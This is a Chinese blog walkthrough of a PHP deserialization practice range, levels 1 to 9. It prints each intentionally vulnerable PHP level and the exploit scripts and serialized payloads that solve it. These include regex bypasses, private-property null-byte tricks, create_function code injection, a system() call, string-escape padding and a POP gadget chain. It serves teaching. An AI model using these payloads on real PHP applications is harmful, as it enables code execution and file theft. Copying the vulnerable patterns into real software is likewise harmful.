PHP-SER-libs靶场通关(1-9)

已于 2024-09-07 19:19:34 修改
阅读量584 收藏 7
点赞数 12
文章标签: 运维 php反序列化 安全
于 2024-09-07 19:18:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73792226/article/details/141998727
版权

一.第一关(基础序列化)

<?php
highlight_file(__FILE__);
class a{
    var $act;
    function action(){
        eval($this->act);
    }
}
$a=unserialize($_GET['flag']);
$a->action();
?>

一个很基础的反序列过程

对输入的flag进行反序列化,再调用action的方法

然后解释eval任意执行

二.第二关(__construct魔术方法)

<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=unserialize($_GET['param']);
if($a->login())
{
    echo $flag;
}
?>

__construct : 在创建对象时候初始化对象。

__destruct : 当对象所在函数调用完毕后执行一般用于对变量赋初值或者在对象被销毁的时候触发 

写一个php程序把他序列化

<?php
class mylogin{
    var $user ;
    var $pass ;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
}

$a = new mylogin("daydream","ok");
var_dump(serialize($a));
?>

三.第三关(cookie传参)

<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
    var $user;
    var $pass;
    function __construct($user,$pass){
        $this->user=$user;
        $this->pass=$pass;
    }
    function login(){
        if ($this->user=="daydream" and $this->pass=="ok"){
            return 1;
        }
    }
}
$a=unserialize($_COOKIE['param']);
if($a->login())
{
    echo $flag;
}
?>

与上一关的差别在与是cookie传参,只需要抓包修改cookie即可

四.第四关(create_function)

<?php 
highlight_file(__FILE__);
class func
{
        public $key;
        public function __destruct()
        {        
                unserialize($this->key)();
        } 
}
 
class GetFlag
{       public $code;
        public $action;
        public function get_flag(){
            $a=$this->action;
            $a('', $this->code);
        }
}
 
unserialize($_GET['param']);
 
?>

这里还用到一个php特性------Array

当array内包裹的第一个值是对象,第二个是对象内的方法时

在反序列化后会调用该对象的方法

<?php
class func
{
        public $key;
        public function __destruct()
        {        
                unserialize($this->key)();
        } 
}
 
class GetFlag
{       public $code;
        public $action;
        public function get_flag(){
            $a=$this->action;
            $a('', $this->code);
        }
} 
$a2=new func();
$b=new GetFlag();
$b->code='}include("flag.php");echo $flag;//';
$b->action="create_function";
$a2->key=serialize(array($b,"get_flag"));
echo urlencode(serialize($a2));
?>

action是写入create_function为下面创造方法

code是为了闭合方法再进行文件包含读取flag

五.第五关(__wakeup)

<?php
    class secret{
        var $file='index.php';
 
        public function __construct($file){
            $this->file=$file;
        }
 
        function __destruct(){
            include_once($this->file);
            echo $flag;
        }
 
        function __wakeup(){
            $this->file='index.php';
        }
    }
    $cmd=$_GET['cmd'];
    if (!isset($cmd)){//判断是否存在
        echo show_source('index.php',true);
    }
    else{
        if (preg_match('/[oc]:\d+:/i',$cmd)){//进行正则匹配
            echo "Are you daydreaming?";
        }
        else{
            unserialize($cmd);//反序列化
        }
    }
    //sercet in flag.php
?>

__wakeup():当反序列化恢复对象之前调用该方法

也就算是出现

o:数字  或者   c:数字

就会直接终止,所以我们就要绕过这个匹配,在序列化后也就是在0:6中6的前面加上一个符号使其不被匹配上所以就有了payload

playload:'O:+6:"secret":2:{s:4:"file";s:8:"flag.php";}'

六.第六关(私有属性)

<?php
highlight_file(__FILE__);
class secret{
    private $comm;
    public function __construct($com){
        $this->comm = $com;
    }
    function __destruct(){
        echo eval($this->comm);
    }
}
$param=$_GET['param'];
$param=str_replace("%","daydream",$param);
unserialize($param);
?>

本关对输入的param进行了一个%的过滤,而且类中的属性的变量是私有属性

private属性序列化的时候格式是 %00类名%00成员名

所以要用\00代替%00实现绕过

<?php
class secret{
    private $comm;
    public function __construct($com){
        $this->comm = $com;
    }
    function __destruct(){
        echo eval($this->comm);
    }
} 
$pa=new secret("system('sort flag.php');");
echo serialize($pa),"\n";
playload:O:6:"secret":1:{S:12:"\00secret\00comm";s:24:"system('sort flag.php');";}
与小写"s"不同,大写"S"表示键名或属性名是区分大小写的。

七.第七关(类中类反序列化)

<?php
highlight_file(__FILE__);
class you
{
    private $body;
    private $pro='';
    function __destruct()
    {
        $project=$this->pro;
        $this->body->$project();
    }
}
 
class my
{
    public $name;
 
    function __call($func, $args)
    {
        if ($func == 'yourname' and $this->name == 'myname') {
            include('flag.php');
            echo $flag;
        }
    }
}
$a=$_GET['a'];
unserialize($a);
?>

在you类中,有一个destruct方法,内将pro赋值给变量project再调用本类中的body中的project

说明body应该是一个类且project是指要调用该类内的方法

另外有一个魔术方法__call:当调用对象中不存在的方法会自动调用该方法

$this->body->$project();

先让body成为my类里的,在让body去调用project,因为my类里没有project所以会调用__call方法

在把myname的值赋给body,yourname的值赋给pro就可以了

playload:'O:3:"you":2:{S:9:"\00you\00body";O:2:"my":1:{s:4:"name";s:6:"myname";}S:8:"\00you\00pro";s:8:"yourname";}';

八. 第八关(增量逃逸)

<?php
highlight_file(__FILE__);
function filter($name){
    $safe=array("flag","php");
    $name=str_replace($safe,"hack",$name);
    return $name;
}
class test{
    var $user;
    var $pass='daydream';
    function __construct($user){
        $this->user=$user;
    }
}
 
$param=$_GET['param'];
$profile=unserialize(filter($param));
if ($profile->pass=='escaping'){
    echo file_get_contents("flag.php");
}
?>

具体:PHP反序列化——字符逃逸漏洞(肯定能看懂的!)_php {i:1;s:65:''}-CSDN博客

playload:O:4:"test":2:{s:4:"user";s:116:"phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";}

九.第九关(POP构造链)

<?php
//flag is in flag.php
highlight_file(__FILE__);
class Modifier {
    private $var;
    public function append($value)
    {
        include($value);
        echo $flag;
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
 
class Show{
    public $source;
    public $str;
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        echo $this->source;
    }
}
 
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
 
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
 
if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
?>
__invoke()    当一个类被当作函数执行时调用此方法。
 
__construct   在创建对象时调用此方法
 
__toString()  在一个类被当作字符串处理时调用此方法
 
__wakeup()    当反序列化恢复成对象时调用此方法
 
__get()       当读取不可访问或不存在的属性的值会被调用

php反序列化之pop链_pop3.phpwelcome-CSDN博客

Smile灬凉城666
关注
  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
vulnhub靶场{GoldenEye-v1靶场实战}
AerYinan的博客
02-10 3422
vulnhub靶场{GoldenEye-v1靶场实战}
PHP源码编译安装
SokminYo
01-29 4419
1.在PHP官网下载PHP的源码包官网下载地址 2.解压并进入文件夹中  tar -zxvfg php-7.1.13 3.安装命令  ./configure  --prefix=/usr/local/php     #安装地址 --with-config-file-path=/etc      #配置文件 --enable-inline-optimization    #
php-SER-libs【made by 这周末在做梦】
这周末在做梦的博客
03-18 5725
本项目是一个php反序列化靶场,题目难度简单,容易上手。
php-SER-libs-main反序列化靶场通关详细思路
qq_73767109的博客
05-30 4556
这里先是要把my类实例化到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习反序列化
串口透传luci-app-ser2net的OpenWrt页面制作
hunningtu的博客
10-10 4904
在网上找了一圈,也没有找到luci-app-ser2net的OpenWrt页面,于是自己动手写了个luci-app-ser2net。至于串口透传模块ser2net_client和ser2net_server可以联系本人。用户只需简单设置,即可实现串口到网络的双向数据透明传输,支持心跳功能,支持5路socket连接。 将luci-app-ser2net目录放到OpenWrt源码的package/u
夜神模拟器安装frida-server图文详解
zaq977684的博客
08-30 6006
夜神模拟器安装frida-server图文详解
IGT-SER通过PLC和触摸屏的通讯口采集设备数据,上报到SQL数据库
PLC通讯智能网关
02-24 2831
IGT-DSER智能网关模块,支持各种PLC、智能仪表、远程IO与数据库之间双向通讯,既可以读取设备的数据上报到SQL数据库,也可以从数据库查询数据后写入到设备;数据库软件支持MySQL、SQLServer、PostgreSQL。相关软件和手册下载 ...
windows server 12 r2安装Hyper-V
你当像鸟飞往你的山~~
12-14 6032
安装Hyper-V是为了安装虚拟机centos系统,做服务器使用 1、点击左下角开始处,打开服务管理器 2、点击添加角色和功能 3、直接下一步 3、勾选Hyper-v,然后点下一步,笔者这里已经安装 4、可以适当勾选上你需要安装的东西,比如Telnet客户端服务端,TCP/IP服务,然后下一步 5、点击安装,等待安装完成 6、打开Hyper-v 7、Hyper-v管理器 至此安装完成,下面可以安装虚拟机,安装centos7了 ...
SE-Net整理阅读
热门推荐
wuRDmemory
05-16 1万+
写在前面 最近算是好不容易抽时间把这两个论文看完了,总体来说收获还是很多的,以下是自己的一些理解和整理。 SE-Net SE-Net的整体思路 引入了注意力的思想,即对于每个通道,用一个权重来表示该通道在下一阶段的重要性; 做成了一个插入式的模块,十分方便与各个基础网络的结合。   Introduction部分 这段文章中作者总结了神经网络的有点,就是 ...
nodejs 里面的http-server
三哥玩前端
06-08 9869
我们有时候会遇到这种情况,一个html文件在本地打开时,测试平常的功能还行,但是,一涉及到ajax请求,就算你是请求本地的json文件,他都会涉及到跨域的问题,浏览器本身就限制了本地打开时,不允许跨域请求的设定,所以,我们就需要在本地跑起一个服务来,然后通过本地ip+端口号,或者localhost+端口号,或者127.0.0.1 + 端口号的形式来访问我们的页面,在本地跑服务,我知道的有四种 1...
php反序列化靶场,集合了常见的php反序列化漏洞——由这周末在做梦制作.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
usb2.0-ser! CH34x 驱动程序 WIN10亲测.zip
05-08
1. 下载并解压“usb2.0-ser! CH34x 驱动程序 WIN10亲测.zip”文件,得到“CH341SER.EXE”。 2. 右键点击“CH341SER.EXE”,选择“以管理员身份运行”以确保有足够的权限安装驱动。 3. 按照安装向导的指示进行操作...
USB-232(usb2.0-ser!)CH341SER 驱动
10-10
USB-232(usb2.0-ser!)CH341SER 驱动。
USB-SERIAL-CH340驱动,解决USB2.0-Ser!
06-12
1. 下载与操作系统匹配的CH341SER驱动程序文件。 2. 解压下载的压缩包,通常会包含一个.exe安装文件。 3. 运行安装程序,按照提示进行操作。 4. 完成安装后,重新启动电脑,系统应该就能自动识别并安装好CH340转串口...
USB2.0-ser!四合一驱动(包括HL-340)
12-31
USB2.0-ser!四合一驱动程序包是一个集合了多种USB到串口转换器驱动的软件包,其中包括HL-340、FT232、HL-2303和HL-0108这四种常见设备的驱动。这个驱动程序集合对于那些需要将计算机的USB接口与使用串行通信的设备...
关于进程的那些事——认识进程(包含环境变量的一些描述)
2301_80148295的博客
09-03 707
僵尸进程和孤儿进程的区别:僵尸进程子进程先于父进程退出。孤儿进程父进程先于子进程退出 为什么要配置环境变量:方便程序执行,直接通过配置的环境变量来搜索可执行程序。设置特定的环境变量可以设置程序的参数。创建子进程之后会将父进程的环境变量自动传给子进程
使⽤docker部署project-exam-system(2)
ln2915275834的博客
09-03 748
称|id:/usr/local/etc/haproxy/haproxy.务,⽽且nginx容器还需要指定名称,web0 web1 web2因为。haproxy代理,创建三个nginx容器,创建⼀个haproxy服。/root/pes/haproxy/haproxy.cfg 容器名。如果没有名称,那么容器就⽆法被haproxy --link。2. 创建⼀个haproxy,将配置⽂件导⼊到容器,在容器。3. 实际的使⽤haproxy容器,只需要将配置⽂件挂载到。
Nginx 平滑升级指南
XMYX-0
09-04 589
Nginx 的平滑升级是一种无中断的升级方式,能够在不影响现有连接的情况下,将 Nginx 从旧版本升级到新版本。
重置vCenter Server的root密码
最新发布
XMYX-0
09-04 777
vcenter server重置root密码
usb2.0-ser 340驱动
08-01
USB2.0-SER 340驱动是一种USB转串口的驱动程序。它用于将USB接口转换为串口接口,使计算机能够通过USB端口与串口设备进行通信。 安装USB2.0-SER 340驱动的步骤如下: 1. 首先,插入USB2.0-SER 340转换器到计算机的USB端口上。 2. 系统会自动检测到新的硬件设备,并试图自动安装驱动程序。如果自动安装失败,我们需要进行手动驱动安装。 3. 打开设备管理器,在“其他设备”或“未知设备”下找到该设备。 4. 右键点击设备,选择“更新驱动程序”。 5. 在弹出的向导窗口中选择“从计算机的设备驱动程序列表中选择”。 6. 点击“浏览”按钮,找到已经下载好的USB2.0-SER 340驱动文件。 7. 完成驱动安装后,设备管理器中的该设备应该没有黄色感叹号或问号。 8. 现在,计算机就可以通过USB端口与串口设备进行通信了。 USB2.0-SER 340驱动的安装使得计算机能够兼容串口设备,例如打印机、调制解调器等。同时,这种驱动还提供了高速的数据传输速率,可提高设备的响应时间和传输效率。 需要注意的是,在安装USB2.0-SER 340驱动之前,我们需要确认驱动的兼容性。有时,厂商会提供特定的驱动程序,我们可以通过他们的官方网站或支持中心获得最新且兼容的驱动。此外,我们还应该确保操作系统与驱动之间的兼容性,以保证设备能够正常工作。 总之,USB2.0-SER 340驱动是一种使计算机与串口设备进行通信的重要驱动程序。通过按照上述步骤安装驱动,我们可以兼容USB转串口设备,并享受高速的数据传输效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Smile灬凉城666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值